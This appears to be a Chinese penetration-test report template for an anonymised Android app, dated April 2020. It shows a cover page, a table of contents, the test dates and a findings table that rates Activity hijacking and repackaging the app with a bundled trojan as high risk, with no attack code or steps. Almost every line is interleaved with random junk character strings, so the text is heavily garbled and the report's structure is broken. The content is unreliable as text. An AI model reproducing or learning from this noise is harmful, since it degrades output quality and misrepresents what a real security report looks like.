- i4 t6 w6 B+ F; M5 {
! b; Y8 X5 c: @* F3 i; O# b% x% ~
+ k9 h, P t( y1 N0 D% F
4 j+ b7 @- F% I6 Q7 n
7 D$ P+ J( {5 ?, A+ n. b) a( A, `: U* V" G4 O2 c+ T2 V3 ~$ c
7 G# T5 b5 M5 }; {! l7 O$ E, m6 w1 M$ X g' Y/ Q$ U2 D
" D) D1 d: I" ]# M# f
% Q6 v, E2 O0 {2 \% s; q6 q
2 C+ c1 e, p) q3 [' r
, q8 h2 {* i; ~" P: K 文档编号:
0 J u# M! f# a' X& [4 L
* G4 s1 q: S$ K7 G! I+ h, r
* O& n% o7 W5 _2 A
3 M+ Q- ^, K" _# P + O; R+ m+ q+ ^! Y' t) u* p
9 d6 g& u/ E% T7 M5 S
% |. y$ T5 h- \* |. X) n
4 N2 ^6 F3 M- T
' B/ y% a# `. l* k' z- K
: s8 U1 d- B4 s/ u, d# W+ c
9 v2 F1 t x( w
$ R7 ~, S- F' [$ T3 H3 o " b5 \; F" Y0 @( j' L
: `3 n2 b1 D& \
|# H4 G5 f5 r9 I5 T" y
' e* R2 h' h0 X
8 y h) e1 [$ E7 v$ ~7 y; F7 R5 z }; s5 j# j+ ]4 ?
2 A3 p [/ k: w
9 W" ~$ l+ Z4 p, |! r- o# [' Z% ?0 H
3 p1 P7 ?2 F/ Q5 m6 Z
7 T; p; K/ h9 q5 g3 }) D
, w! R# [3 X3 M/ c8 w7 W8 l: |0 w* f4 }
' K* ?& S( \" k& a @) L
% ], ^* ]/ n9 ?" @2 p4 U7 O
& N7 V5 `5 m* w, H
% r& i" @: h* L- l- U$ S1 I
% i$ M/ M. S3 o% n, d! Z1 s( a4 u" P4 a1 L9 T. Q
" A: `% d& s( Q
5 Q7 c4 Q) T- f7 J! E+ N& `& U
7 {2 J5 [" r; Q Q7 @! m, c
0 x) J! T8 t$ X) B. K7 F2 _
6 D6 q4 T6 O/ D; @. C: Y, z9 {& e# o- s$ B6 u: }
某某某APP渗透测试 4 Y- H- r+ B7 v- ^/ z6 M( R1 B! D
! h6 [$ N) q6 O1 k2 i1 x8 O4 o( v
7 f6 o6 \5 m& Q
# B0 t9 U- i2 R. q2 Z 7 `; q' A9 [( l9 C+ G7 [. x
, j( u ]6 W) q5 Z- m * q {- Y* q. C* H* h) j* `
: t* I. \+ @6 {7 T9 N' A9 K
' I p% ^* p1 @7 E$ o% Q4 Y$ ^; N M4 H1 U
* E- _2 t K5 Z4 t8 b6 t- L$ v6 s$ m7 u% n, X
* D9 @- e9 k# e9 Q, u9 K7 @
' [5 }; S E, V9 }4 z6 { E
G# I. W; u4 U, p% H# h8 l2 |9 m, F, C
+ u! a \9 R+ @4 F
* G Y$ s6 d4 z3 J; p3 W2 t1 r4 p9 A, ^+ h% h- r& J
% q' Z# |- V J+ r& X, q; {8 y* C) X( }! U
, o( O: G! \; a# A; R6 V9 i. R
- p, D; Z% e0 Q% W4 d$ r/ I1 Y
2 y+ d$ f- S+ C0 A5 T" B& w, j) z
# u- a( _4 t6 z6 B' T- F8 T# {, c 3 J6 ^ a( N& O( h, q0 _
$ |$ m1 i% M% q* w
0 I! Z+ P# b0 C, Z
/ c! a; n' R/ v! f8 ?9 z
( ~: x$ r4 W3 ~' x3 X5 o
1 ]" W' [, z+ M4 i* T 技 术 报 告
0 ~0 a% L9 K( @! G: o8 d X1 y8 H* T
% {5 k/ R/ A8 M( }4 s, z/ A
( B% r0 {9 _0 [: `' ? . {! a$ C/ Q! k9 q' d5 n9 u ?2 R
9 O) K5 e; A) \ r+ O* D l/ a" \ 1 \0 K7 X5 y4 f7 V+ ~/ l
1 ^: r: U. ~4 w7 y! ^
/ k9 L! l& [# N0 T! I6 [2 T0 D
- S- h# {& W/ x F" l& u5 N
* o+ j% y2 W2 B7 L
7 \7 V# ]2 j+ l* M8 O3 V+ J
4 M& g3 v7 N' X3 ^1 ]
7 \8 l0 }* y8 ~6 j) ?4 @; v: Z
* V' ~. m: _' N3 Y7 e1 W% f8 z
8 _9 u, p0 |3 h7 |2 |3 J
8 n9 e. H) n; Z4 B
4 {# v& c( C$ h + }7 X# Z2 x f
/ x4 U; s! ]/ X8 A8 f7 I
e1 c; j$ d( f, N" L2 D0 a1 s
2 o$ f" W4 [2 V; ^- k8 O2 T) t, R
/ J6 Z+ L2 h' d, L4 y- a0 i6 c5 k; ~
: q7 R0 ^: r9 ~0 [7 }- T3 w6 {
0 b1 Q2 u% \& y4 @" H( P
7 |0 t! z b+ @
: O. }7 D- u+ C
: ]) i6 z4 k. [. ^* X, _3 y/ r! l
: b* t/ F4 a F, V/ c. H& K+ U( ^% G
0 g6 y C" n& E& N K4 i7 l9 f* k
0 ?) d: z8 m" X; G( k
: i( M- S! h0 T1 }
2 L# x) f! N; [0 q- x5 i
( e- U$ U7 ?! i
# G! [1 b* f: Q2 X0 P, i' {
) Q4 n3 |; s# M) y3 [ ! ^5 F+ W. C, `* v9 L
2 u2 o* d% E& x; o( s # \, ?9 a& Y" p/ [$ G6 `
. v! j2 B7 j* _4 c
" K) l7 ?# w0 K% d. b4 W; u, P7 @0 J" s/ A( l; |7 d( `
. j7 \7 |; Q. ^: j& g
" N5 q9 t: V" v ) L1 x$ D6 d9 ^; X2 ]9 c
0 o6 A+ T! ^) C" x% R
# L/ M+ _3 q+ w8 r7 f, t3 I2 @0 h4 s9 u! @4 C
" w. U9 e* y9 J9 r( k2 `; x) U, m8 v6 r8 g
+ z+ j* I- ~% p6 p5 d7 ^4 e
7 @; f* q# e0 V) L" x
6 c' q8 z3 Q* A) A. E1 t' Q( \: B8 T& M/ A6 w: v: N
4 O* F {1 }$ ~0 C0 b' {, R4 s2 P
$ N6 c- c1 ]% }' Q) H2 n - q/ N6 o& p2 t1 U! b4 A
+ P/ E+ {0 }$ w& y7 j: }
6 j9 P' K0 n2 }7 l
0 m; _' ?/ r9 F
! T! b9 l1 N+ N1 {4 {8 `% B0 V2 @, n1 ^& T- {. `1 b6 W0 P
! ]$ b. v' { ^: W) _
; P% i# p. A- B% Q4 D! `
, ^5 l8 ~1 A) o/ E, [& u
: `5 P6 H# ~# w |9 S$ P/ S# C! X' D- k
# N# f! s2 D) {- q8 J9 R) V; {, v% q% n
% K; N/ j8 E2 k5 b& E9 h( E2 Y3 B _6 K+ V8 p+ ? u) r$ ]
% E% H( D1 L6 C7 S
6 S; v: f [; P5 E/ i& \) K 5 y% z3 g' G' y
+ }9 R# \7 |7 Z8 L6 ?
" s+ O8 F' s, v4 M4 `9 e- r5 v, {/ t! ]( R8 y# p7 v
+ Y+ l) ^- ?, o+ O, U8 U1 {) q* T+ ?- g4 H
- C( a. N w8 |& o& C; x! b& E3 `
3 `0 W6 w) Q% {+ x7 l( I, \6 S 0 o7 @: \; l' Q8 E4 b: m4 M; q
, @- |) v) f: g5 i
2 _ O" ?- X {! l
: {# d; r. y" z. c; c4 Q" B( c
( c0 ~: M6 p7 e$ C0 N3 x6 u5 l, a9 m
/ a/ m0 `9 F/ K4 o5 l9 M7 x* B3 T: C/ T7 _6 Q1 C/ @! B
* c6 I8 Z6 I z; q- I( B
: |4 q( T3 w) T7 ^$ m% W+ @ 4 b, z* b# t) L; d% x b- n
6 I/ d0 F2 @% w- o4 v' x D) y( `' r 4 Q) G; s, k+ l$ I
! A- H, c' X# _; P$ D$ X& T) R/ b
- n! |: q2 t! W0 R1 C5 m' r. G0 V9 Q
) V% r. @' ]3 e ?. Y& q) ^! v
9 p% Q1 |1 m. B- B- r8 S2 V$ [
6 {7 h5 i. b# u4 n . m* t4 F% l3 K* \9 B; z
2 Y( L+ t' B/ B
) r7 A0 B/ D' p) ?. [& B
) m1 L% f% g" i9 a. U" y
- H. r. Z9 I @9 j' w8 K, w- r* S1 n$ P1 n! C1 u. b# c
w w) {* G; w" r
' V! `; `! m9 H4 R3 J w `
; ^" v4 B0 E, T/ Y( I7 @
# B- r: ~1 L) h1 }& e# j. U& W
0 E( V5 Z2 j- F$ \2 ~) p
# L3 o. i7 B/ ~5 c1 @ 二〇二〇年
; J+ s* @ H" ]/ @7 q: B+ D7 c7 c6 t+ W( c2 s$ y
9 f2 ?; D/ J5 U
: _& D5 F, F9 n, u w$ r5 S1 |9 c% Z8 J/ N, l
( p H& y& G0 O1 q: ?2 o5 f
% C6 n$ G- P# a [
0 A2 S8 F1 E) z& c$ _ k0 c; f ' D/ u+ v( d% [0 f7 f
) D1 x" D/ q/ S6 k4 G* Y) Z ! _) O% R! D N/ v) U/ a
: I/ n* n2 {! E1 c- Y
4 j0 E9 T5 ^2 m- G; P7 S' a3 c' u/ C/ {4 U) |
. N$ M! t, O$ G1 g1 w5 J w; y+ P6 b
8 v( C+ J3 T' y8 S0 H& U. t% R% A3 |5 z6 ^/ V
/ \. E4 ?9 m2 \# L' a) w
; Q. _4 \$ v! g6 U3 k' _3 L; K
B. m/ L/ _; n+ l
4 B+ W) M2 Q5 | k0 u* ?; B$ ]$ ?# S7 g 目 录
* |7 q' |: v: R
7 S6 `& g' e0 ~1 N* U. v
" Q+ r8 S) o) k- ^ i8 |1 N
' [5 E: g: U$ R3 J3 V 0 G' M) s/ a+ b) {, e; J! j1 [
1 _8 O' y$ O; R! Q3 ] 1 r4 n' L1 n7 N
- Q4 H* h% p' [, d6 q% _+ m
$ O5 }- T' H3 S9 K
! |5 H; I6 Y8 ]9 ]1 Y1 l7 I6 r
0 g" I9 z6 J( B% T1 X* @- x" {
, m* P+ ?5 T6 y* D1 C
' F3 g3 Q* \' t% l% n! [
! b7 @" `% d% v7 X' Y/ N/ o 1 概述... 3
@# r2 x" U# r) k) x& y
3 S0 G: B2 p: y
2 ?2 f9 Q; }( O3 n% i, t$ Y/ P8 V- i3 A1 \$ l2 v$ z4 a4 {- S7 z
1 G# z8 n1 p8 w r! g
7 H4 L; G: P8 {3 |8 X+ c! c
1.2测试时间... 3 " \# P$ W8 R7 X: |
" `9 u/ F1 _; X. g9 C/ n' F) F' u3 V
! y: `6 @7 q' C: H, \4 @+ K: v( @( z2 M# I" y3 r3 r! |
J5 W9 C4 t" S: g( _$ R! @5 V) p8 g, a, J9 I; t: V
1.3测试对象... 3 5 d) |2 U$ U* e! {
- b [: a5 y" d: I4 H/ ~3 Z- K7 |
! ?( O) K* {2 L% o: F2 y
' S/ |6 p; K5 y7 Y. Y# V& u ) N i' r9 U# v0 z5 \; m6 s& P
7 J# r' w+ g1 G% @! u6 \ a
1.4测试结果... 3 / }5 p6 o9 K+ v8 ^6 i# D8 t0 r
, V/ ^. W ~' J
) `$ b6 d8 v" ~. S* b. }
3 R9 F( u6 Q! P% X$ V' w
4 |, N; {3 c3 Y- ]# D3 X* E
% w. d* ^$ } e2 m( G 2 检测结果... 4 % f4 o! i3 T3 m9 |! o2 }
8 [$ \% B! N% ]. @6 d+ ~( S
% m) g" }0 E. N, J
" y' o6 F) |1 S! O/ V# ?9 S
; k7 e$ w7 g+ Y5 A& j; R4 O2 ~
$ L1 N. H- ^. t- _8 f 2.1 某某某... 4
! F1 K' f+ a6 y/ T" a) F: J$ J ~( c# K9 ^4 C8 P# F0 d9 T
$ p5 M" l x) f; Q
9 v; Q9 R' y: _, z 5 H$ [/ d% ]+ Z$ @) Z5 Q( t9 L
. m' K4 x3 x- P$ V2 E' m x
2.1.1检测目标... 4
4 r# a9 X$ [* S
7 |7 k6 [2 T8 n- E
' y- M% F+ D+ C7 q8 E# V! m
6 u7 }7 @, |! I; x) A" ~# b
4 c, Y7 R8 H/ L8 L, @' E4 N2 K8 o- E
2.1.2检测结果... 4 / _0 Y I( D# v1 ~
% Q& ]9 C! O |8 L8 |& w
8 u" y) W* \$ G# O5 A; C1 S8 Q& F+ }. t6 s
6 u5 @& N, g+ U- M
; R7 u2 o f0 m: g% P 2.1.2.1. 4
* H5 c+ O2 v' j/ B' v! `
; r- O, c1 V3 f5 c& Q3 Z) O! r& w
7 X7 r( `) l7 d' x- P0 \4 ~5 t: @! W; e' R
1 L% S: X J1 k4 A f" m
4 t3 I( G# H6 F; v, O( m 2.1.2.2. 6 ' t' N8 I3 ]- x% S3 n
2 q7 a& a. _; ~8 @
1 K9 c& c/ D) p$ w. M, Z+ {- }5 b
% ?) P8 `" |7 F+ z ]1 ^9 q8 R9 ~2 p7 N) Y9 ^3 v
2 t! X) g# e7 f$ }/ z, M
0 J3 @* |7 S! r5 J. {3 u5 e$ l, \5 w. m
: w& ^% q4 M( P! a7 s0 r! }
$ O+ J6 F P! x3 |. U( f
G7 Z5 i8 ^2 S) j( D3 b
# `1 e, c' M. O l/ v$ e# O : i6 i- n, h# ?# U7 ]' d0 a
* }4 Y! b1 E# j* |7 W* _
& X8 G, ^+ T- b# h
$ ]/ t0 Y, n1 b! o7 m6 x5 t* G! f" V , `) y+ M, C; Y& O; H0 _! N. ?: u
! M$ W. N' x6 W' H9 ^3 m
0 N/ `5 Z4 l& l( B8 @1 L2 }* g
. [: I3 L) h9 }# a! d4 n 1 概述
4 x$ `/ `' ]% G, u0 W) }, d2 W/ u) P5 \6 I
" M) N9 V; S' ]0 E) H% M+ a* g6 }0 `5 h: W+ W5 s8 ?$ ~- W" Q
0 V% l$ S& @: |2 _+ Z9 H: v X! q
/ J; r5 ?: \! i7 O+ { 1.2测试时间 / V1 i) @# O9 E' z j$ Z. y
5 S6 b* r6 g! Q2 z$ F5 m; A
7 L7 Y: d1 ~3 ]! H- B
, o6 L+ h0 ^! W& w" I) e3 s ! [. q9 b( Q4 E$ t. q+ i8 O! X! a
N; F8 k* @" V ; w. |, Q; x* Q5 |6 D$ U
( M* v# {0 O7 B) t! R4 S K
- c- I6 G+ D8 J* x1 H! n1 t
2 c7 S ]- E' {' K/ \: u$ H$ \
|
6 Y: D, p. I" p9 ?
N+ k5 M" i( Z1 \8 s; q4 @
1 j" G0 V. q: X
1 W5 y( s5 } z2 v 渗透测试时间
+ Q% d) \9 v! g9 u# Y) ~! ? d' F6 b9 Q
) S' w6 {, o& \. V9 U
# ^( Q6 B2 x, V3 @' p |
' ^/ F, x# o1 t$ J. J
) \1 v& Z8 u( o8 Y: _. D
. c0 R# f. k) x0 o
+ Z7 @- h! S7 c! Q9 n4 K
+ ]0 P! d) V/ o% {1 b5 ?0 |, H/ g2 l$ \7 V
|
" @9 Q0 l$ P F. R* A; k7 q
; r1 m& i6 D- d8 F/ E. E
$ H' m3 W8 S5 g7 E9 n" M/ M S
* {$ W# N# e+ f% I- ^& B: I2 g 起始时间 ' }5 [6 G4 o2 i7 x; M3 V: `
1 P9 a4 r9 G% ?" p5 a" }$ z7 c
' I3 o- B7 I8 [" o: Y! H
& N1 i! E( J- Q |
( ]6 L+ @0 r* r0 G) T6 M* L7 k* K1 I5 z% M
' M9 q# m, x3 x' Z/ @
" M2 z; s4 f5 r# Y( F) }, A! j
0 ^/ U6 w2 ]) W* T S! u
9 ?4 S( }4 R# W6 J, p 2020年4月6日 : c h2 `+ R2 |7 c0 P% `
4 S1 D% n6 h) l# @# q% T! g' ? $ j/ H: w5 a. t) d/ R
9 @! V3 T- w$ t5 ?3 n4 c |
" Y% Q6 y4 M c; a" {: F+ R$ d7 I& v" T
7 i- N3 j4 \9 V* W" P: `/ y! M. C$ _' T( q; h# F
* g9 k/ ~3 ^5 N* T( S8 a
7 c. n( _! w& g) _, W* e* |
| * L7 v# @2 K, k3 n) L
3 X$ ]6 [8 H; Q& @
0 T9 ^; [. x' K8 B$ z& D$ y& r
% ^2 e2 J. l; O; ^$ U 结束时间
B* J$ |8 G/ E4 I. u: v' f, t& @1 A" M8 Q% X
& Y c4 ]6 q6 G4 q& p! B$ B% m$ `5 G! v. I
|
; b6 {8 N' a( e! W5 n
3 Z3 i. y/ v: Z; j) @
% y+ M7 K' z% I9 s- N$ k
N( \+ T6 G o7 k, Y! b , N4 x' u7 N" u ~- e9 c/ S
" s6 M! Q8 g( u- c3 i) ?
2020年4月9日 : n" O* P8 V# T W3 @+ \$ I
& v( u3 r+ F1 x; ?( O3 e! ?
$ @0 j$ A: E8 |0 b, s6 S" Y* X0 T7 l: j; W2 \; k
| , x: l1 `0 R; X0 l$ v
. t* c( o! p: W- B6 F
; ~4 @$ ^3 ~( @
/ k; \! w# ? P( n7 n9 a ! E8 y2 A1 T3 v' ~6 V/ \- L
q! {5 t. R/ I5 h% t
# t4 C' n9 t, s/ o* F
) O/ W7 Z/ n7 M
8 i5 x! z+ o" E; t: V6 g
: @' ? m, {6 J0 R 1.3测试对象 ! J* H: r$ L* T# {: n* }
) W+ ^4 T+ ~1 S0 s$ L7 M1 k
8 O. I) D/ t% w8 h
0 c6 Y# G3 \. U$ b 9 [- b* y; l m" Y N
, N( b7 [0 m, ]' w: ^' z
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
( h" o. L$ S5 m( u3 `( Q8 r" L6 u
$ H+ a- Z7 B; K8 e# @/ P+ |+ F
$ m, f! \& x5 G4 j h/ p, R/ [/ Q
6 y. v; Z" E2 J
. S. c0 [$ s/ {
! p- q. ^9 v4 R$ a& N3 u
表1-1 检测对象
# p& q$ u& B% }
/ G3 L* M- | V g- B6 e
7 M3 M- q; B3 M: u# ^9 d% u( t. A. v+ D* Z9 M) P1 R* E1 q- G$ ?
/ ?# U W/ w- ?' x
8 o* F* n3 D1 D1 I% K& s
7 B) ?- S. h! _+ l. k+ n+ I! g7 m& k8 x3 K
' I* [ G' z. @1 F
H, g2 o, a/ q: I+ ^1 T$ Y j |
# w0 }% u6 S# e% E5 B' u( e8 f! x% A3 R( s( ~5 i% R5 h7 n' B
& m) Z1 I, X# q3 n
, s. E) t5 }) | 序号 % Y9 d* M7 P! t- e c
! K7 b' p) \6 q" t4 i, V
+ n% G( h6 q! |
3 l4 @' V0 Q! {% N, {/ c | ; o* C# w8 w: [& j: e
% F8 t' W1 |9 X
% N2 W) `: p, l# Y- o& Z1 z$ c/ C) l& Z. V5 j
( b0 n# h; u7 X
) ?* L/ u- s* v4 q7 X' h3 x- t: J 测试对象 ! M7 z# V& o9 p* d( m, A3 O* S1 ?
% l! k, L; u& o; u* u4 c8 _9 V 6 q6 [+ }+ m0 _6 Y0 {0 L3 {
6 {$ @! n% b/ I T
|
# G+ e5 k3 a9 k( h
. D6 ~7 V! F/ ~ ; x7 B* f" c+ W3 G+ H2 a( c& r
$ b* ~5 r2 c" p, V' ]% n% C. c
3 M, B6 }! L/ U- T8 h
4 @4 A* T$ A% B$ v$ l; p0 g3 ~
测试地址 6 ~7 A2 U3 y3 l& x
v, z5 P$ m H# r2 O& T" D3 H # E8 _- c J+ c8 T0 a6 x, B
$ a1 X; Q ^& A9 k
| % U1 P- }! D8 ]) F! b
* M: C, f) o& j5 X/ @5 y, f+ E5 R
3 g9 w& \ ` v% o: N2 x/ g2 ^; l# X, A* f
M9 v0 `$ q0 m7 [
% a, b# y, F$ U' [* l) k) q. N 安全漏洞 i% w! Y+ U. M! d R& @' Q# }2 b
. o/ r- S% P0 e
0 E" C4 z9 V3 R8 r8 n9 ^0 q; ~& D" \ O8 _" y& U' ?; S: m
| & @1 O4 ]0 C# d* a% K+ l
2 G. n/ u7 ` `3 _0 |" q7 K. R7 a
$ ~3 F* n3 [4 }# H$ L! K' ^
! s |: l' T& T# D/ \% Y" e4 S% h) k) Y
n- _# d. I2 g6 u
0 G& v& Q3 T1 @6 N |
, p/ C' l% f# L! {" E# ?- S2 B! {: O5 v& t/ @
( J- }9 B+ U+ T; C; e1 p# o' D- i% ^+ Z" s B+ |) ~
1 $ j1 R$ S5 ?/ Y! y7 B
' |% |+ [) t, ~
B3 P' ~# P% L: j8 N& [+ d% @% |2 U! j! u- ~- w
|
( \- E. P& D5 _: j) p1 O
$ l3 m( Z* O) E& @) n
g: t N% e6 B s1 o& b& m4 e
0 e0 ~* p( b6 F' p |
& W z, { b5 u& h6 E. F0 S/ \2 k, f' \' Y' P
某某某安卓APP ; b: s5 E6 [, T8 P) @* a. H$ w
4 K9 _2 ~) j% s7 L/ N) E
$ a0 u8 u+ g2 k7 A/ v4 @1 o3 p- h: e7 I3 s
| ) A. W% g# F$ s
; e$ }) X- P8 s1 A
5 P, m7 h: Z2 i. ]+ _8 Y2 `
$ u6 Y }3 `* w. h3 Q# [- ]9 L2 L
* j7 o2 R! L7 ~6 o* E0 `( ]0 L; ~, l7 w' H, d# g
( p* l2 m8 `/ `
1 r( m1 C5 O1 C9 T7 j7 O
9 X& R8 m# \- J$ L. e' f% }0 Z! d
4 F1 Z. b( z1 V6 X |
) l9 K9 o4 C. U B z m! n, d5 E/ L$ m3 r2 W; L/ E \0 p
9 \6 W) H6 X* ^8 d' b0 r3 R- B* N
3 L; a+ I! \$ f' M, z" K2 q6 N# R/ `( q7 T- v/ [
2
% ~. U8 K! C% o$ l* X8 }) q& J+ `. g9 U9 @8 V
4 W3 _: i9 S' ^/ w6 K
+ `; \- n8 D% h6 G; N | ~$ N' U* C1 l
! G' c1 I H. |: l& C
+ E1 `* c& d3 n
A( U! ]9 k, K
1 Z& ]8 [3 a2 ]$ w: U0 ^3 u9 v6 [
: L6 |% |4 N6 ]% ^/ E( ~$ i
/ u2 O: m1 J6 d2 `0 }$ e( `" }
: m( [& I& O. i
% m, D& q) f( N) n: ]& D. r2 L9 x: ]' w3 ~$ f3 Z' E) Y( s; e
1.4测试结果 6 |: [! j; Y. U7 S
. z7 \) v! n7 i W( X
/ g7 q3 Q. A- ~3 p
) s) P5 V9 |0 l) A& |3 m
; E; w: j7 @4 X+ r. u* m( a g6 p" P" J- H
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
; R/ s& {2 J* i2 R9 a$ N% V
" T) Z7 w8 u' {/ x3 d* ~ o3 V
) @8 z- t# O9 ^& e. [& }3 d4 {
2 V" W0 X; p b' a# w
/ G4 d/ b0 |5 ^- T$ J. M
" A$ r+ p" d7 T. Q& v+ r- j
, }, o# X& K2 K8 o1 h# k' p) n9 J/ H- j( R* X7 b' p2 c
7 Z# R z1 c: s. G( a& d/ U( }! Y7 ~; ]: W) D9 C8 {
5 T7 z- N7 z1 [) q
. K, I3 h* ^1 @! h, N
9 \$ f) K4 Y! e9 V$ A) D1 @
4 d3 ^/ E* P3 f. R ( z" @7 H# _0 l/ e1 i
$ D2 V; _% `2 b% s) D5 K
1 R! {7 c+ }2 }8 `7 i* m
1 a# \1 L" p8 J) h3 t2 E% [3 ~
| * [0 n( V, e. C' i
9 l4 T5 e! j# o# h! M- N9 s/ B `$ Z
. y" v( W# e5 C8 m8 c; S
4 X+ \5 }6 P# J1 v 序号 ) D. m1 S+ P( P+ M8 {) R
) ^" O s# B9 m8 Z
, G; P6 }6 U+ g
6 p# ~. d& U* a% ] |
: s& M6 s3 e5 V8 A( H
4 L7 |" i& `0 `3 f& K
7 c1 @6 H5 M& w- U" V2 U2 t+ Y* H5 x* o9 {
, G# D5 ?$ a8 \3 v8 b* G
" f8 Q$ F) w) ]7 }- e- F0 C 系统名称 0 N& S1 `+ i; X4 A
, ^3 F5 Q! b2 B$ k; y
1 w3 b5 }3 y+ U! v' e" i, _3 \1 `
, @6 A/ ~/ m! Z8 j9 p/ t | : c) ]5 h( e! N: E
7 C) A/ \" g' }+ J# w- h7 r # J/ w/ m* U+ Q- H) D4 z. p
0 A$ r+ y6 G3 i
n* f% x8 k9 q9 z
) K# [" {$ ?4 \ F4 Z 漏洞名称 6 `) c9 f& }8 J) }
/ `0 y8 H+ y. C* V
. M8 O6 a3 P$ c; N
, o1 M- Q* u4 D1 _ | % M* _+ V$ q3 _6 s
* l/ o: I3 w" y
0 k. u* Y5 J( f/ F' C! i' s! {+ G, o9 u: I
1 S2 O8 o1 M$ f' A7 ?1 \: _+ S" m
. q) m! a3 m; [- a, V, c, _ 漏洞危害
$ e+ ?! P& a; F R# q0 s0 f8 U4 s
9 ?- C s8 b& R e( U
" D( R8 n/ n6 m1 V0 S) ~) n% N | ' l4 T% z0 t2 s+ M" w* P
& o: \ `+ A) w0 G
" W4 }! Z3 h' |1 Y4 d/ r
2 x+ f! H& j% }
: H% A+ o" w; X! P5 t' S# p! {* U [& p: {& H8 p+ K* g0 z
修复结果 $ q0 p1 k/ i R, L4 I
" j8 d, M/ z" S( j( u
2 f+ f, i. c- v. m3 ]! @1 H0 M$ {0 K- q) P% j- o- h. Y1 Y0 b
| 6 P% g4 q# Q4 y' z( u
/ z1 u7 \; p2 P1 D# N3 g
8 f% c9 u, K& Q9 X4 G" E) }
1 f2 C) G' g2 p& E0 Q
( A. A& N/ R( B* R6 E s8 Q
& _/ h/ g( h5 o4 o |
" a+ `* h9 H! [% `
& Z' K# @- A/ k* M% n& x
- S8 a& @" ~ G2 t# W0 t/ v
6 g2 y4 j, h1 \* F' t$ y- W- _/ G 1 5 F: Q9 ~/ k) u# L
: g* o+ Q q {9 O- e
2 a# q4 v. L; Q: j0 k4 p" J2 k$ M. M7 [4 d
| r% a( [6 f7 v( N! H8 m
Q9 U: `& L6 y# x" x7 d 8 k) h$ [# z5 ~* Z- }
* S: q4 G, m! v, |& m5 d
2 h% M: G1 ~/ |/ U. f0 T5 O3 G' A& s; N. J9 o
某某某某某某APP ; `, h+ F& V! c1 ]( G
* h0 c8 d6 c( ?3 m5 r
+ g1 E! c& o1 C5 P- j! j, g
. M! A& B" K; {% l n1 | | . G- L& {; b% L1 h7 {+ s
3 ?$ {$ N8 x' { T% k# G! ?, s - Z9 b8 K- l7 O! ^3 v* N! h) S5 l
8 V1 v- @7 }4 r2 j
8 c( Y% O, L' o7 \# b. H" E! d
, G2 p4 U/ S z% @+ O6 D" ? Q* g Activity 劫持
7 j) k; z# t: y; E6 A+ x% T0 z5 e3 Q h7 g
8 n' {* u) H+ n. ]% i1 s
) v) I8 D* v6 c: Y / a @( |( r5 k5 E
) j0 d0 r) m- P$ J& b& Y( b' K - z" z. U0 e' N9 P8 Z4 A( N+ m8 \* l
2 V' X' h0 C+ u8 ^, j
5 W {( Q5 d/ a: P1 g) ~9 M _
5 W G$ G+ H1 Q! i! M6 j7 ?
| 0 L% j1 `, C$ G H" U
* D$ L7 n0 L1 h3 }
) M L5 g, f# d+ F; ~- E
6 d* G5 }: o9 n! m7 z* `- k 9 a( ?+ q9 q X+ l8 b1 L
( E$ p/ _6 F4 e1 ^4 j 高 & W% ]2 _5 \& d" e; k: q$ y4 u
: |+ h% P1 ^/ h ?, l
0 q- _' S% {% a0 m9 Z7 w
4 ?/ `9 l$ K" T# C6 ]- ]- \- g
| " S6 L6 v* P1 b: u7 N0 j
1 v6 ^& W( o# Z/ s! D7 T" G u2 ` , I4 s. }$ \( _) h
: Y' y, D Y: H6 p# [) `
6 l6 Q' w2 k5 T6 B! h
- z3 ?4 M5 d5 M
, t4 l: ]( [; |, s$ [
; q5 {1 u9 }' F' [, | / B& i2 }7 c8 I3 f
0 o/ n9 y" E1 E3 l2 s' g; p
| : Z8 q" }! y( O* a: n# V, @4 {
& w, W3 i7 ]4 S+ B6 Y
! s$ b/ B6 d( @7 E' p( D! W ?0 F6 z& Y, e- @
$ h6 I! Y6 I- Z3 b) y% V# o+ e" b8 ]5 Z- y$ K, i1 B& P
| % `' Y3 x& \3 x# _0 l1 X# I
( Y- h& h x3 X1 k4 T+ K, M
' q- v Y/ F0 t- L% F2 }$ {
& `9 I3 a" n- F) N5 R$ r 2
; L+ t% y$ v2 z9 J) D
% P5 b# f& T' _5 Z* \( U; B / K( w' ~# v* T2 Z& q% |
4 h B5 n/ E8 ~* v, N% t0 F4 [ | 2 M+ n: S8 _) D: {
1 U: B! I, Y9 J, ?- e
! J% I" {, b+ J6 }9 ^+ `4 J* p4 v' C$ X0 V! ]1 X" p3 h
0 u5 q4 f# w* }+ w! s/ I C1 b. n
9 z" z! W0 d5 D% f+ `% v 某某某某某某APP 2 C( s$ Q# q8 u3 ?9 O
# `6 o5 |7 g; J$ r# L: N, R
% f3 s/ {$ [' l& u1 x( I& l# A- B5 R+ [/ @
| 1 `5 U& l0 P; R- d: b
9 l$ j* s9 ?' Y5 N ; K5 ]( e) G0 f1 D6 `
/ c% g6 Q8 B/ A3 n! r$ A! E ( C" t2 D6 b( b
2 I$ _8 i2 j5 Z+ g: l/ p 反编译二次打包捆绑木马、篡改APP代码
4 N8 d8 q2 t$ r
0 K! u" W/ T% M1 l% d / N& d6 R1 y3 u/ z6 z3 g5 w
" V5 w1 p% {0 l | ( S5 f0 r; t& W. t" Y5 M
5 C( _& V. K7 J! `8 ^$ _
$ f& a) _1 v; Z; ]0 W" w3 d3 ]! e6 L/ {8 H; j
3 n. A% ]" T$ O9 c3 I
% p5 k2 {. u+ d& j% E& ? 高
2 @3 s' g& o/ @6 s8 X: A6 K
1 h& W* }$ n T6 a
5 {0 t5 I6 _" k2 i. O( |
; b' W, v% h+ \! Z |
, ?2 Y& A a: r3 y/ Z$ N/ n# W" ^( [; j8 P: D$ d" f9 o4 z
- a6 {; D* j7 G. N2 ~8 a: b, v/ } w8 ~; z( r" N9 c
( v/ j" l5 K: _# c4 Q. x6 X+ s& l5 ]
# w, f2 D0 ?$ k1 b" h
w6 \4 [+ K- w( X: q
4 O- n8 l! z8 D5 C
+ V6 T4 |" ]# \0 y8 v5 @ | - v6 `1 X8 C: f0 w- s
; O8 {$ F) Q' G1 W5 Q [
& ], l& |- |3 J2 k# D% `' b0 O
. C: @' v" k! E7 w o ! u. `4 j5 ]3 @0 J+ k2 L
6 z8 `# F$ e: O9 O' m
+ f- O* L( a* z. Q; H7 G6 g
0 t2 s9 k- M# _9 |7 G / j n% }4 s+ m/ f; t* \7 A+ @( g% _
* O, j9 w( X' E! L- O0 I
2 g- N+ N: m" U, B) z
4 U0 l" }+ q7 A2 z- t* \
